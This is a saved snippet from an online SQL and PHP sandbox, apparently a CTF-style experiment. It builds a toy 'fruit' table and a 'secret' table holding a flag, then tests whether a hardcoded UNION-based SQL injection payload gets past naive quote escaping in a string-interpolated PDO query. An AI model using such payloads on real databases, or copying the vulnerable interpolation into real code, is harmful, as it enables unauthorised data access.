Hi! Could we please enable some services and cookies to improve your experience and our website?
No, thanks.
Okay!
Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code
CREATE TABLE fruit (
id INT AUTO_INCREMENT PRIMARY KEY,
name VARCHAR(255),
sku VARCHAR(255)
);
INSERT INTO fruit (name, sku) VALUES
('Apple', 'a123'),
('Banana', 'b456'),
('Orange', 'o789');
CREATE TABLE secret (
id INT AUTO_INCREMENT PRIMARY KEY,
secret_value VARCHAR(255)
);
INSERT INTO secret (secret_value) VALUES
('flag{this_is_secret}'),
('internal_use_only');
SQL Server:
MySQL 8.0
MySQL 8.0 Sakila (ReadOnly)
MySQL 9.3.0
MariaDB 11.4
MariaDB 11.8
MariaDB 10
MariaDB 10 Sakila (ReadOnly)
SQLite 3
SQLite 3 Preloaded
PostgreSQL 10 Bookings (ReadOnly)
PostgreSQL 13
PostgreSQL 14
PostgreSQL 15
PostgreSQL 16
PostgreSQL 17 + PostGIS
PostgreSQL 17 + PostGIS WorkShop (ReadOnly)
MS SQL Server 2017
MS SQL Server 2019
MS SQL Server 2022
MS SQL Server 2022 AdventureWorks (ReadOnly)
Firebird 4.0
Firebird 4.0 (Employee)
RedDatabase 5.0
Oracle Database 19c (HR)
Oracle Database 21c
Oracle Database 23c Free
SOQOL
ClickHouse
Run SQL code
Save snippet
<?php
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, true);
$_GET['sku'] = "' OR 1=1 UNION SELECT 1, table_name, 3 FROM information_schema.tables; -- -";
$_GET['name'] = "Apple";
$sku = strtr($_GET['sku'], ["'" => "\\'", '\\' => '\\\\']);
$name = $_GET['name'];
$query= "SELECT * FROM fruit WHERE sku LIKE '%$sku%' AND name = ?";
$stmt = $pdo->prepare("SELECT * FROM fruit WHERE sku LIKE '%$sku%' AND name = ?");
$stmt->execute([$name]);
$data = $stmt->fetchAll(PDO::FETCH_ASSOC);
foreach ($data as $v) {
echo join(' | ', $v) . "<br>";
}
echo ($sku);
echo ("******");
echo ($name);
echo ("******");
echo ($query);
?>
PHP version :
PHP 7.4
PHP 8.0
PHP 8.1
PHP 8.2
PHP 8.3
PHP 8.4
Run PHP Code
Save snippet